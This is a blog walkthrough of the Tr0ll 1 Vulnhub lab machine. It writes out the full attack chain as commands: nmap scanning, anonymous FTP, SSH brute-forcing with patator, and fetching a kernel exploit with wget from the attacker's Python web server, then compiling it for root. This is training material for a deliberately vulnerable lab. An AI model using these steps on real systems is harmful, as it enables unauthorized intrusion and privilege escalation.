Posts Tr0ll 1 Vulnhub Walkthrough
Post
Cancel

Tr0ll 1 Vulnhub Walkthrough

Posted Sep 9, 2019 2019-09-09T18:01:38+02:00 by Mohamed Ezzat

Machine Info:

  • Difficulty: Beginner
  • Goal: Gain root access and get Proof.txt from the /root directory

Network Scanning

Netdiscover

As we do every time, we run netdiscover to determine the target’s IP address.

1

netdiscover -i eth1

netdiscover

Nmap

Then we run nmap to discover open ports and running services.

1

nmap -p- -A 192.168.56.115

nmap

Enumeration

FTP Enumeration

As a result of nmap, we have discovered the following open ports and services:

  • FTP:21
  • SSH:22
  • HTTP:80

So, we start enumerating FTP service. We noticed that from the results of nmap, we can login to FTP anonymously. After we logged in as anonymous witn blank password, we found a pcap file named “lol.pcap”. We get that file on our local machine to take a look over it then we quit from FTP.

1
2
3
4

ftp 192.168.56.115
ls
get lol.pcap
quit

FTP

We know that from the file extension (pcap), it is a recorded packet capture file. Therefore we use wireshark or tcpdump to analyze that packet and see if there is any important information. We look to the file content for a while and then we figured out that there is a retrieved file named “secret_stuff.txt” that file contains a web directory named “sup3rs3cr3tdirlol”.

1
2
3

wireshark lol.pcap
or
tcpdump -nnttttAr lol.pcap | less -Sr

wireshark tcpdump

HTTP Enumeration

We go to that directory to see what is there. We found a file named “roflmao” and we downloaded it.

1

http://192.168.56.115/sup3rs3cr3tdirlol/

sup3rs3cr3tdirlol

That file is an executable file, so we change its permissions to execute it. After we execute that file, it prints “Find address 0x0856BF to proceed”. We expect that address may be an another web directory, so we go to the website and place that address in the URL.

1
2
3

file roflmao
chmod +x roflmao
./roflmao

tcpdump

And what we expected happened, we got a webpage contains a couple of folders. We open the first folder “good_luck/” and we found a list of words that may help us to brute force SSH, so let’s keep that in mind.

1
2

http://192.168.56.115/0x0856BF/
http://192.168.56.115/0x0856BF/good_luck/which_one_lol.txt

0x0856BF which_one_lol

Then we open the second folder “this_folder_contains_the-password/” and we found a text file named “Pass.txt” that contains a word of “Good_job_:)”.

1
2

http://192.168.56.115/0x0856BF/this_folder_contains_the_password/
http://192.168.56.115/0x0856BF/this_folder_contains_the_password/Pass.txt

this_folder_contains_the_password Pass

Exploitation

Now we have a list of words and a password, so let’s assume that list is a list of users. We copy and paste all of the list words to a file named “users.txt” so we can use it for SSH brute forcing. We first used hydra for SSH brute forcing but we have no luck to success, so we try to use patator for SSH brute forcing. Also, we tried use almost all possible forms of word “Good_job_:)” as a password but it did not work. Then afterwhile we noticed that it says “this_folder_contains_the-password/” not “this_folder_contains_the_file_that_contains_the-password/” which may be means that the name of text file “Pass.txt” is the password itself. Then we run the following patator command and we successfully found the right username which is “overflow”.

1

patator ssh_login host=192.168.56.115 user=FILE0 0=/root/vulnhub/troll1/users.txt password=Pass.txt

patator

Then we login to ssh and finally we are in as a normal user. Now, we need to escalate our privileges. Therefore, we use the following commands to know the kernel version and then search for any available exploits.

1
2
3
4

ssh overflow@192.168.56.115
id
uname -a
lsb_release -a

ssh_login

Privilege Escalation

We use searchsploit or google to find any available privilege escalation exploits that related to the target’s kernel version “3.13.0” and we found that exploit (37292)[https://www.exploit-db.com/exploits/37292]. We download it and transfere it to the target machine through python temporary web server on port 8080.

1
2
3
4

# On kali terminal
searchsploit linux kernel 3.13.0 privilege escalation
searchsploit -m linux/local/37292.c
python -m SimpleHTTPServer 8080

1
2
3

# On target terminal
cd /tmp
wget http://192.168.56.157:8080/37292.c

37292

Then after we get the exploit on the target machine, we compile it and execute it. And eventually we got a root shell and the flag “proof.txt”.

1
2
3
4
5
6
7

ls
gcc 37292.c -o 37292
./37292
id
cd /root
ls
cat proof.txt

root

Vulnhub
vulnhub boot2root ethical hacking
This post is licensed under CC BY 4.0 by the author.
Contents

Kioptrix Level 5 Vulnhub Walkthrough

Tr0ll 2 Vulnhub Walkthrough